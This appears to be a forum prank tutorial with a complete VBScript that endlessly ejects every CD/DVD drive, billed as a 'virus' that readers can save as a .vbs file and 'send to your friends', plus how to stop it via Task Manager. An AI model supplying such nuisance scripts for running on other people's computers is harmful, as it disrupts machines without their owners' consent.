Here is a small and easy way to make your own virus that make your CD/DVD-rom tray totally mad!

What you need to do is simply open notepad
Start -> Run -> notepad
and then paste the following code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Once done, save the notepad file with any name you like but with a .vbs extension. For example: CDromMadness.vbs
Run it or send to your friends
You can end the madness by going to task manager and end the process of wscript.exe
NEED HELP????
itz not working
Its working. Try copying and pasting exactly.